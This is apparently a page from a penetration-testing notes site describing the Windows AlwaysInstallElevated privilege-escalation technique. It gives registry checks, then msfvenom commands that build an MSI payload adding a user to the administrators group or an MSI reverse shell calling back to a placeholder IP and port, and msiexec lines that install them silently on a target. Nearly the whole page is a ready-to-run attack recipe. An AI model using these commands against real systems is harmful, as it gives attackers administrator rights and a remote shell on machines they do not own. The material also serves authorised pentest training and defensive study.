Always Install Elevated

Check with:

reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated

From the output, notice that "AlwaysInstallElevated" value is 1. This needs to be on both to be exploited.

Steps:

# Generate payload to add user to admin group
msfvenom -p windows/exec CMD='net localgroup administrators user /add' -f msi-nouac -o setup.msi

OR

# Create a reverse shell
msfvenom -p windows/x64/shell_reverse_tcp LHOST=IP LPORT=PORT -f msi -o reverse.msi

# Run it on the target machine:
msiexec /quiet /qn /i setup.msi 
msiexec /quiet /qn /i reverse.msi        <--- Needs a netcat listener

PreviousUnquoted Service Path NextWeak Permissions

Last updated 4 years ago

Was this helpful?